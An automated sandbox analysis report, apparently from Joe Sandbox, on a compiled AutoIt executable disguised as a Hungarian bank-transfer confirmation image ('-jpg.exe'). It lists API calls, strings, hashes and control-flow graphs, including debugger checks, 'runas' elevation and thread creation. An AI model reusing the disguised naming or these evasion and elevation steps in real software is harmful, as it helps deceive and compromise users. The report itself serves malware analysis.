78260->78263 78264 467a2c 78261->78264 78265 467a4b 78261->78265 78262 467917 78267 4339fa 3 API calls 78262->78267 78262->78272 78266 4679dc 78263->78266 78268 4115d7 52 API calls 78264->78268 78269 4115d7 52 API calls 78265->78269 78270 4679e6 78266->78270 78648 44ae3e CloseHandle moneypunct 78266->78648 78271 467928 78267->78271 78274 467a31 78268->78274 78275 467a49 78269->78275 78271->78272 78277 46792f 78271->78277 78272->78245 78273 467964 78272->78273 78273->78124 78649 436299 52 API calls 2 library calls 78274->78649 78282 408f40 VariantClear 78275->78282 78646 4335cd 56 API calls 3 library calls 78277->78646 78338 4533eb 78287->78338 78290 4750ee 78293 408f40 VariantClear 78290->78293 78291 475129 78342 4646e0 78291->78342 78298 4750f5 78293->78298 78294 47515e 78295 475162 78294->78295 78332 47518e 78294->78332 78298->78142 78332->78332 78339 453404 78338->78339 78340 4533f8 78338->78340 78339->78290 78339->78291 78340->78339 78414 4531b1 85 API calls 5 library calls 78340->78414 78415 4536f7 53 API calls 78342->78415 78344 4646fc 78416 4426cd 59 API calls _wcslen 78344->78416 78346 464711 78348 40bc70 52 API calls 78346->78348 78354 46474b 78346->78354 78349 46472c 78348->78349 78417 461465 52 API calls _memmove 78349->78417 78351 464741 78353 464793 78353->78294 78354->78353 78418 463ad5 64 API calls __wcsicoll 78354->78418 78414->78339 78415->78344 78416->78346 78417->78351 78418->78353 78496->78168 78543 443d73 78507->78543 78511 46eac5 78510->78511 78512 46eaac 78510->78512 78573 45f72f 54 API calls 78511->78573 78513 46eab1 78512->78513 78514 46eabb 78512->78514 78557 4689aa 78513->78557 78565 46ea4a 78514->78565 78518 46eaca 78518->78218 78521->78197 78523 40da20 CloseHandle 78522->78523 78524 40de4e 78523->78524 78605 40f110 78524->78605 78535->78212 78536->78220 78537->78222 78539 40da37 78538->78539 78540 40da29 78538->78540 78539->78540 78541 40da3c CloseHandle 78539->78541 78540->78228 78541->78228 78542->78226 78548 40df90 78543->78548 78546 40df90 2 API calls 78547 443da5 78546->78547 78547->78205 78554 40dfa2 78548->78554 78549 425e30 78556 40e050 SetFilePointerEx 78549->78556 78550 40e01b SetFilePointerEx 78555 40e050 SetFilePointerEx 78550->78555 78553 40dff3 78553->78546 78554->78549 78554->78550 78554->78553 78555->78553 78556->78553 78574 40d370 78557->78574 78566 40d370 52 API calls 78565->78566 78567 46ea59 78566->78567 78568 44c228 54 API calls 78567->78568 78573->78518 78575 4115d7 52 API calls 78574->78575 78576 40d385 78575->78576 78606 40f125 CreateFileW 78605->78606 78607 42630c 78605->78607 78609 40de74 78606->78609 78608 426311 CreateFileW 78607->78608 78607->78609 78608->78609 78645->78262 78647->78249 78648->78270 78649->78275 78650->77954 78651->77866 78652->77871 78653->77920 78654->77929 78655->77920 78656->77889 78657->77916 78658->77882 78659->77886 78660->77890 78661->77931 78662->77931 78663->77931 78664->77931 78665->77904 78666->77922 78667->77909 78668->77942 78669->77962 78670->77962 78671->77962 78672->77954 78673->77966 78674->77981 78675->77974 78676->77979 78677->77986 78678->77986 78679->77922 78680->77876 78681 42d154 78682 480a8d 259 API calls 78681->78682 78683 42d161 78682->78683 78684 480a8d 259 API calls 78683->78684 78684->78683 78685 42b14b 78692 40bc10 78685->78692 78687 42b159 78688 4096a0 398 API calls 78687->78688 78689 42b177 78688->78689 78703 44b92d VariantClear 78689->78703 78691 42bc5b 78693 40bc24 78692->78693 78694 40bc17 78692->78694 78696 40bc2a 78693->78696 78697 40bc3c 78693->78697 78704 408e80 VariantClear 78694->78704 78705 408e80 VariantClear 78696->78705 78700 4115d7 52 API calls 78697->78700 78698 40bc1f 78698->78687 78702 40bc43 78700->78702 78701 40bc33 78701->78687 78702->78687 78703->78691 78704->78698 78705->78701 78706 425b2b 78711 40f000 78706->78711 78710 425b3a 78712 4115d7 52 API calls 78711->78712 78713 40f007 78712->78713 78714 4276ea 78713->78714 78720 40f030 78713->78720 78719 41130a 51 API calls __cinit 78719->78710 78721 40f039 78720->78721 78722 40f01a 78720->78722 78750 41130a 51 API calls __cinit 78721->78750 78724 40e500 78722->78724 78725 40bc70 52 API calls 78724->78725 78726 40e515 GetVersionExW 78725->78726 78727 402160 52 API calls 78726->78727 78728 40e557 78727->78728 78751 40e660 78728->78751 78734 427674 78737 4276c6 GetSystemInfo 78734->78737 78735 40e5e0 78740 4276d5 GetSystemInfo 78735->78740 78765 40efd0 78735->78765 78736 40e5cd GetCurrentProcess 78772 40ef20 LoadLibraryA GetProcAddress 78736->78772 78737->78740 78743 40e629 78769 40ef90 78743->78769 78746 40e641 FreeLibrary 78747 40e644 78746->78747 78748 40e653 FreeLibrary 78747->78748 78749 40e656 78747->78749 78748->78749 78749->78719 78750->78722 78752 40e667 78751->78752 78753 42761d 78752->78753 78754 40c600 52 API calls 78752->78754 78755 40e55c 78754->78755 78756 40e680 78755->78756 78757 40e687 78756->78757 78758 427616 78757->78758 78759 40c600 52 API calls 78757->78759 78760 40e566 78759->78760 78760->78734 78761 40ef60 78760->78761 78762 40e5c8 78761->78762 78763 40ef66 LoadLibraryA 78761->78763 78762->78735 78762->78736 78763->78762 78764 40ef77 GetProcAddress 78763->78764 78764->78762 78766 40e620 78765->78766 78767 40efd6 LoadLibraryA 78765->78767 78766->78737 78766->78743 78767->78766 78768 40efe7 GetProcAddress 78767->78768 78768->78766 78773 40efb0 LoadLibraryA GetProcAddress 78769->78773 78771 40e632 GetNativeSystemInfo 78771->78746 78771->78747 78772->78735 78773->78771 78774 3c323f8 78775 3c30048 GetPEB 78774->78775 78776 3c324dd 78775->78776 78788 3c322e8 78776->78788 78789 3c322f1 Sleep 78788->78789 78790 3c322ff 78789->78790 78791 425b5e 78796 40c7f0 78791->78796 78795 425b6d 78831 40db10 52 API calls 78796->78831 78798 40c82a 78832 410ab0 6 API calls 78798->78832 78800 40c86d 78801 40bc70 52 API calls 78800->78801 78802 40c877 78801->78802 78803 40bc70 52 API calls 78802->78803 78804 40c881 78803->78804 78805 40bc70 52 API calls 78804->78805 78806 40c88b 78805->78806 78807 40bc70 52 API calls 78806->78807 78808 40c8d1 78807->78808 78809 40bc70 52 API calls 78808->78809 78810 40c991 78809->78810 78833 40d2c0 52 API calls 78810->78833 78812 40c99b 78834 40d0d0 53 API calls 78812->78834 78814 40c9c1 78815 40bc70 52 API calls 78814->78815 78816 40c9cb 78815->78816 78835 40e310 53 API calls 78816->78835 78818 40ca28 78819 408f40 VariantClear 78818->78819 78820 40ca30 78819->78820 78821 408f40 VariantClear 78820->78821 78822 40ca38 GetStdHandle 78821->78822 78823 429630 78822->78823 78824 40ca87 78822->78824 78823->78824 78825 429639 78823->78825 78830 41130a 51 API calls __cinit 78824->78830 78836 4432c0 57 API calls 78825->78836 78827 429641 78837 44b6ab CreateThread 78827->78837 78829 42964f CloseHandle 78829->78824 78830->78795 78831->78798 78832->78800 78833->78812 78834->78814 78835->78818 78836->78827 78837->78829 78838 44b5cb 58 API calls 78837->78838 78839 425b6f 78844 40dc90 78839->78844 78843 425b7e 78845 40bc70 52 API calls 78844->78845 78846 40dd03 78845->78846 78852 40f210 78846->78852 78849 40dd96 78850 40ddb7 78849->78850 78855 40dc00 52 API calls 2 library calls 78849->78855 78851 41130a 51 API calls __cinit 78850->78851 78851->78843 78856 40f250 RegOpenKeyExW 78852->78856 78854 40f230 78854->78849 78855->78849 78857 425e17 78856->78857 78858 40f275 RegQueryValueExW 78856->78858 78857->78854 78859 40f2c3 RegCloseKey 78858->78859 78860 40f298 78858->78860 78859->78854 78861 40f2a9 RegCloseKey 78860->78861 78862 425e1d 78860->78862 78861->78854
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2383988440-0
                                                                                                          • Opcode ID: 27bffd3e1947c4510e6972f1f565318e64fccf5ab022684a44ee13d7cdcec7e9
                                                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                          • Opcode Fuzzy Hash: 27bffd3e1947c4510e6972f1f565318e64fccf5ab022684a44ee13d7cdcec7e9
                                                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                          Strings
                                                                                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                          • C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, xrefs: 0040D5EB, 0040D61A, 0040D631, 0042E281
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                          • String ID: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                          • API String ID: 2495805114-2789081374
                                                                                                          • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                          • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2087 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2096 40e582-40e583 2087->2096 2097 427674-427679 2087->2097 2100 40e585-40e596 2096->2100 2101 40e5ba-40e5cb call 40ef60 2096->2101 2098 427683-427686 2097->2098 2099 42767b-427681 2097->2099 2104 427693-427696 2098->2104 2105 427688-427691 2098->2105 2103 4276b4-4276be 2099->2103 2106 427625-427629 2100->2106 2107 40e59c-40e59f 2100->2107 2116 40e5ec-40e60c 2101->2116 2117 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2101->2117 2118 4276c6-4276ca GetSystemInfo 2103->2118 2104->2103 2113 427698-4276a8 2104->2113 2105->2103 2109 427636-427640 2106->2109 2110 42762b-427631 2106->2110 2111 40e5a5-40e5ae 2107->2111 2112 427654-427657 2107->2112 2109->2101 2110->2101 2120 40e5b4 2111->2120 2121 427645-42764f 2111->2121 2112->2101 2119 42765d-42766f 2112->2119 2114 4276b0 2113->2114 2115 4276aa-4276ae 2113->2115 2114->2103 2115->2103 2123 40e612-40e623 call 40efd0 2116->2123 2124 4276d5-4276df GetSystemInfo 2116->2124 2117->2116 2130 40e5e8 2117->2130 2118->2124 2119->2101 2120->2101 2121->2101 2123->2118 2129 40e629-40e63f call 40ef90 GetNativeSystemInfo 2123->2129 2133 40e641-40e642 FreeLibrary 2129->2133 2134 40e644-40e651 2129->2134 2130->2116 2133->2134 2135 40e653-40e654 FreeLibrary 2134->2135 2136 40e656-40e65d 2134->2136 2135->2136
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                          • String ID: 0SH$#v
                                                                                                          • API String ID: 3363477735-2448020801
                                                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                                                          • API String ID: 2574300362-3542929980
                                                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 3403648963-554117064
                                                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                          • API String ID: 1762048999-758534266
                                                                                                          • Opcode ID: 69bafca5d408916e74ea07af5abce12c4e64ced7c2932eb1db3ac477afef5aa5
                                                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                          • Opcode Fuzzy Hash: 69bafca5d408916e74ea07af5abce12c4e64ced7c2932eb1db3ac477afef5aa5
                                                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
